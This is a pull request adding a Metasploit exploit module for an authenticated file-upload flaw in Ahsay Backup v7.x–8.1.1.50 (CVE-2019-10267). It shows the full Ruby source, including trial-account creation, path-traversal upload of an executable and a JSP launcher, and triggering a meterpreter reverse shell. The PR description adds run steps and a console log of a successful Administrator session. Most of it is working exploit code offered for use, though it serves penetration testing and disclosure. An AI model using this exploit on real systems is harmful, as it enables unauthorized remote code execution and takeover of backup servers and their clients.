### PR TITLE
Exploit Ahsay backup 7.x - 8.1.1.50 file upload

### DIFF
--- a/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
+++ b/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
@@ -12,11 +12,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => 'Ahsay Backup < v8.1.1.50 file upload',
+      'Name'        => 'Ahsay Backup v7.x - v8.1.1.50 (authenticated) file upload',
       'Description' => %q{
-        This module exploits An insecure file upload and code execution flaw in Ahsay Backup < v8.1.1.50. It can be exploited in Windows and Linux environments to get remote code execution (usualy as SYSTEM). This module has been tested successfully on Ahsay Backup v8.1.1.50 with Windows 2003 SP2 Server. 
-         
-        Because of this flaw all connected clients can be configured to execute a command before the backup starts. Allowing an attacker to takeover even more systems and make it rain shells!
+       This module exploits an authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. To succesfully execute the upload credentials are needed, default on Ahsay Backup trial accounts are enabled so an account can be created.  
+It can be exploited in Windows and Linux environments to get remote code execution (usualy as SYSTEM). This module has been tested successfully on Ahsay Backup v8.1.1.50 with Windows 2003 SP2 Server. Because of this flaw all connected clients can be configured to execute a command before the backup starts. Allowing an attacker to takeover even more systems and make it rain shells!
       },
       'Author'       =>
         [
@@ -25,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'     => MSF_LICENSE,
       'References'  =>
         [
-          [ 'CVE', 'CVE-2019-10267'],
+          [ 'CVE', '2019-10267'],
           [ 'URL', 'https://www.wbsec.nl/Ahsay_vulnerabilities' ],
           [ 'URL', 'http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe' ]
         ],
@@ -65,8 +64,6 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('UPLOADPATH', [false, 'Payload Path', '../../webapps/cbs/help/en']),
 
       ])
-
-   
   end
 
   def check
@@ -104,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # return Exploit::CheckCode::Unknown
   end
 
-  def isTrialEnabled?()
+  def is_trial_enabled?()
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','isTrialEnabled'),
       'method' => 'POST',
@@ -117,7 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def checkAccount?()
+  def check_account?()
     headers = create_request_headers()
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','getUserProfile'),
@@ -160,7 +157,6 @@ class MetasploitModule < Msf::Exploit::Remote
           # Create account and check if it is valid
           if createAccount?()
             drop_and_execute()
-            
           else
             fail_with(Failure::NoAccess, 'Failed to authenticate')
           end
@@ -168,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Remote
           #Need to fix, check if account exist
           print_good("No need to create account, already exists!")
           drop_and_execute()
-        end  
+        end
       end
     elsif username != "" and password != ""
       if checkAccount?()
@@ -182,10 +178,9 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       fail_with(Failure::UnexpectedReply, 'Missing some settings')
     end
-   
   end
 
-  def createAccount?()
+  def create_account?()
     headers = create_request_headers()
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','addTrialUser'),
@@ -194,7 +189,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => headers
     })
     # print (res.body)
-    
     if res and res.code == 200
       print_good("Account created")
       return true
@@ -216,19 +210,18 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def drop_and_execute()
-    
     path = prepare_path(datastore['UPLOADPATH'])
     exploitpath = path.gsub("../../webapps/cbs/",'')
     exploitpath = exploitpath.gsub("/","\\\\\\")
     requestpath = path.gsub("../../webapps/",'')
-    
+
     exe = payload.encoded_exe
     exe_filename = Rex::Text.rand_text_alpha(10)
     exefileLocation = "#{path}/#{exe_filename}.exe"
     upload(exefileLocation, exe)
     #../../webapps/cbs/help/en
     exec = %Q{<% Runtime.getRuntime().exec(getServletContext().getRealPath("/") + "#{exploitpath}\\\\#{exe_filename}.exe");%>}
-    
+
     jsp_filename = Rex::Text.rand_text_alpha(10)
     jspfileLocation = "#{path}/#{jsp_filename}.jsp"
     upload(jspfileLocation, exec)
@@ -247,7 +240,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_good("Exploit executed!")
     end
   end
- 
+
   def upload(fileLocation, content)
     print_status("Uploading payload")
     username = Rex::Text.encode_base64(datastore['USERNAME'])
@@ -265,9 +258,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => headers,
       'data' => content
     })
-    
     register_file_for_cleanup(fileLocation)
-
     if res && res.code == 201
       print_good("Succesfully uploaded #{fileLocation}")
     else

--- a/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
+++ b/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
@@ -14,7 +14,8 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'        => 'Ahsay Backup v7.x - v8.1.1.50 (authenticated) file upload',
       'Description' => %q{
-       This module exploits an authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. To succesfully execute the upload credentials are needed, default on Ahsay Backup trial accounts are enabled so an account can be created.  
+       This module exploits an authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. To succesfully execute the upload credentials are needed, default on Ahsay Backup trial accounts are enabled so an account can be created.
+
 It can be exploited in Windows and Linux environments to get remote code execution (usualy as SYSTEM). This module has been tested successfully on Ahsay Backup v8.1.1.50 with Windows 2003 SP2 Server. Because of this flaw all connected clients can be configured to execute a command before the backup starts. Allowing an attacker to takeover even more systems and make it rain shells!
       },
       'Author'       =>

--- a/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
+++ b/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
@@ -1,0 +1,278 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Ahsay Backup < v8.1.1.50 file upload',
+      'Description' => %q{
+        This module exploits An insecure file upload and code execution flaw in Ahsay Backup < v8.1.1.50. It can be exploited in Windows and Linux environments to get remote code execution (usualy as SYSTEM). This module has been tested successfully on Ahsay Backup v8.1.1.50 with Windows 2003 SP2 Server. 
+         
+        Because of this flaw all connected clients can be configured to execute a command before the backup starts. Allowing an attacker to takeover even more systems and make it rain shells!
+      },
+      'Author'       =>
+        [
+          'Wietse Boonstra'
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', 'CVE-2019-10267'],
+          [ 'URL', 'https://www.wbsec.nl/Ahsay_vulnerabilities' ],
+          [ 'URL', 'http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe' ]
+        ],
+      'Privileged'  => true,
+      'Platform'    => 'win',
+      'DefaultOptions' => {
+        'RPORT' => 443,
+        'SSL' => true,
+        'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+      },
+      'Targets'     =>
+        [
+          [  'Windows x86',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'win'
+            }
+          ],
+          [ 'Linux x86', # should work but untested
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'linux'
+            },
+          ],
+
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 1 2019'))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('TARGETURI', [true, 'Path to Ahsay', '/']),
+        OptString.new('USERNAME', [true, 'Username to Ahsay', 'ahsay01']),
+        OptString.new('PASSWORD', [true, 'Password to Ahsay', 'Ahsay01!']),
+        OptString.new('CREATEACCOUNT', [false, 'Create Trial account', 'false']),
+        OptString.new('UPLOADPATH', [false, 'Payload Path', '../../webapps/cbs/help/en']),
+
+      ])
+
+   
+  end
+
+  def check
+    trialEnabled = isTrialEnabled?()
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+
+    if trialEnabled and datastore['CREATEACCOUNT'] == "true"
+      if username == "" or password == ""
+        print_status("Please set a username and password")
+        return Exploit::CheckCode::Unknown
+      else
+        # print_status("create account")
+        return Exploit::CheckCode::Vulnerable
+      end
+    elsif username != "" and password != ""
+      if checkAccount?()
+        print_status("Username and password are valid")
+        return Exploit::CheckCode::Vulnerable
+      else
+        print_status("Username and password are invalid")
+        if trialEnabled
+          print_status("Server supports trial accounts, you can create an account!")
+        end
+        return Exploit::CheckCode::Unknown
+      end
+    elsif trialEnabled
+      print_status("Server supports trial accounts, try creating an account")
+      return Exploit::CheckCode::Unknown
+    else
+      print_status("Server does not support trial accounts, use a valid username and password.")
+      return Exploit::CheckCode::Fail
+    end
+
+    # return Exploit::CheckCode::Unknown
+  end
+
+  def isTrialEnabled?()
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','isTrialEnabled'),
+      'method' => 'POST',
+      'data'   => ''
+    })
+    if res and res.code == 200 and "ENABLED" =~ /#{res.body}/
+      return true
+    else
+      return false
+    end
+  end
+
+  def checkAccount?()
+    headers = create_request_headers()
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','getUserProfile'),
+      'method' => 'POST',
+      'data'   => '',
+      'headers' => headers
+    })
+    if res and res.code == 200
+      print_good("Username and password are valid!")
+      return true
+    elsif res and res.code == 500 and "USER_NOT_EXIST" =~ /#{res.body}/
+      # fail_with(Failure::NoAccess, 'Username incorrect!')
+      return false
+    elsif res and res.code == 500 and "PASSWORD_INCORRECT" =~ /#{res.body}/
+      fail_with(Failure::NoAccess, 'Username exists but password incorrect!')
+    else
+      return false
+    end
+  end
+
+  def create_request_headers()
+    headers = {}
+    username = Rex::Text.encode_base64(datastore['USERNAME'])
+    password = Rex::Text.encode_base64(datastore['PASSWORD'])
+    headers['X-RSW-custom-encode-username'] = username
+    headers['X-RSW-custom-encode-password'] = password
+    headers
+  end
+
+  def exploit
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+
+    if isTrialEnabled?() and datastore['CREATEACCOUNT'] == "true"
+      if username == "" or password == ""
+        fail_with(Failure::NoAccess, 'Please set a username and password')
+      else
+        #check if account does not exists?
+        if !checkAccount?()
+          # Create account and check if it is valid
+          if createAccount?()
+            drop_and_execute()
+            
+          else
+            fail_with(Failure::NoAccess, 'Failed to authenticate')
+          end
+        else
+          #Need to fix, check if account exist
+          print_good("No need to create account, already exists!")
+          drop_and_execute()
+        end  
+      end
+    elsif username != "" and password != ""
+      if checkAccount?()
+        drop_and_execute()
+      else
+        if isTrialEnabled?()
+          fail_with(Failure::NoAccess, 'Username and password are invalid. But server supports trial accounts, you can create an account!')
+        end
+        fail_with(Failure::NoAccess, 'Username and password are invalid')
+      end
+    else
+      fail_with(Failure::UnexpectedReply, 'Missing some settings')
+    end
+   
+  end
+
+  def createAccount?()
+    headers = create_request_headers()
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','addTrialUser'),
+      'method' => 'POST',
+      'data'   => '',
+      'headers' => headers
+    })
+    # print (res.body)
+    
+    if res and res.code == 200
+      print_good("Account created")
+      return true
+    elsif "LOGIN_NAME_IS_USED" =~ /#{res.body}/
+      fail_with(Failure::NoAccess, 'Username is in use!')
+    elsif "PWD_COMPLEXITY_FAILURE" =~ /#{res.body}/
+      fail_with(Failure::NoAccess, 'Password not complex enough')
+    else
+      fail_with(Failure::UnexpectedReply, 'Something went wrong!')
+    end
+  end
+
+  def prepare_path(path)
+    # path = datastore['UPLOADPATH']
+    if path.end_with? '/'
+      path = path.chomp('/')
+    end
+    path
+  end
+
+  def drop_and_execute()
+    
+    path = prepare_path(datastore['UPLOADPATH'])
+    exploitpath = path.gsub("../../webapps/cbs/",'')
+    exploitpath = exploitpath.gsub("/","\\\\\\")
+    requestpath = path.gsub("../../webapps/",'')
+    
+    exe = payload.encoded_exe
+    exe_filename = Rex::Text.rand_text_alpha(10)
+    exefileLocation = "#{path}/#{exe_filename}.exe"
+    upload(exefileLocation, exe)
+    #../../webapps/cbs/help/en
+    exec = %Q{<% Runtime.getRuntime().exec(getServletContext().getRealPath("/") + "#{exploitpath}\\\\#{exe_filename}.exe");%>}
+    
+    jsp_filename = Rex::Text.rand_text_alpha(10)
+    jspfileLocation = "#{path}/#{jsp_filename}.jsp"
+    upload(jspfileLocation, exec)
+    if datastore['SSL']
+      proto = "https://"
+    else
+      proto = "http://"
+    end
+    url = "#{proto}#{datastore['RHOST']}:#{datastore['RPORT']}" + normalize_uri(target_uri.path, "#{requestpath}/#{jsp_filename}.jsp")
+    print_status("Triggering exploit! #{url}" )
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, "#{requestpath}/#{jsp_filename}.jsp"),
+      'method' => 'GET'
+    })
+    if res and res.code == 200
+      print_good("Exploit executed!")
+    end
+  end
+ 
+  def upload(fileLocation, content)
+    print_status("Uploading payload")
+    username = Rex::Text.encode_base64(datastore['USERNAME'])
+    password = Rex::Text.encode_base64(datastore['PASSWORD'])
+    uploadPath = Rex::Text.encode_base64(fileLocation)
+
+    headers = {}
+    headers['X-RSW-Request-0'] = username
+    headers['X-RSW-Request-1'] = password
+    headers['X-RSW-custom-encode-path'] = uploadPath
+    payload = "test"
+    res = send_request_raw({
+      'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','upload'),
+      'method' => 'PUT',
+      'headers' => headers,
+      'data' => content
+    })
+    
+    register_file_for_cleanup(fileLocation)
+
+    if res && res.code == 201
+      print_good("Succesfully uploaded #{fileLocation}")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
+    end
+  end
+
+end


### PR DESCRIPTION
This exploit will upload  a file to the server, it is possible to change the path and upload it in a directory that is accessible through the webserver. For this to work a valid user account is necessary, but trial accounts are enabled by default and an account can be created this way. 

Installation if the Ahsay Backup:
- [ ] Install Windows server
- [ ] download the vulnerable version: `http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe`
- [ ] Install cbs-win.exe on Windows server
- [ ] Start the application ( I start it manually from `C:\Program Files\AhsayCBS\bin\startup.bat`)

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/misc/ahsay_fileupload`
- [ ] enable create trial account `set CREATEACCOUNT true`
- [ ] set RHOST `set RHOST 172.16.238.175` 
- [ ] set LHOST `set LHOST 172.16.238.235`
- [ ] run exploit `run`
- [ ] We should receive a meterpreter shell.

## msfconsole output
```
msf > use exploit/windows/misc/ahsay_fileupload
msf exploit(windows/misc/ahsay_fileupload) > show options

Module options (exploit/windows/misc/ahsay_fileupload):

   Name           Current Setting            Required  Description
   ----           ---------------            --------  -----------
   CREATEACCOUNT  false                      no        Create Trial account
   PASSWORD       Ahsay01!                   yes       Password to Ahsay
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                                     yes       The target address
   RPORT          443                        yes       The target port (TCP)
   SSL            true                       no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                          yes       Path to Ahsay
   UPLOADPATH     ../../webapps/cbs/help/en  no        Payload Path
   USERNAME       ahsay01                    yes       Username to Ahsay
   VHOST                                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf exploit(windows/misc/ahsay_fileupload) > set CREATEACCOUNT true
CREATEACCOUNT => true
msf exploit(windows/misc/ahsay_fileupload) > set RHOST 172.16.238.175
RHOST => 172.16.238.175
msf exploit(windows/misc/ahsay_fileupload) > set LHOST 172.16.238.235
LHOST => 172.16.238.235
msf exploit(windows/misc/ahsay_fileupload) > run

[*] Started reverse TCP handler on 172.16.238.235:4444 
[+] Username and password are valid!
[+] No need to create account, already exists!
[*] Uploading payload
[+] Succesfully uploaded ../../webapps/cbs/help/en/lcofxnrzON.exe
[*] Uploading payload
[+] Succesfully uploaded ../../webapps/cbs/help/en/myjnJMFlNi.jsp
[*] Triggering exploit! https://172.16.238.175:443/cbs/help/en/myjnJMFlNi.jsp
[+] Exploit executed!
[*] Sending stage (179779 bytes) to 172.16.238.175
[*] Meterpreter session 1 opened (172.16.238.235:4444 -> 172.16.238.175:1114) at 2019-07-16 14:59:45 +0200
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/lcofxnrzON.exe' on the target
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/myjnJMFlNi.jsp' on the target

meterpreter > getuid
Server username: AHSAY-123\Administrator

```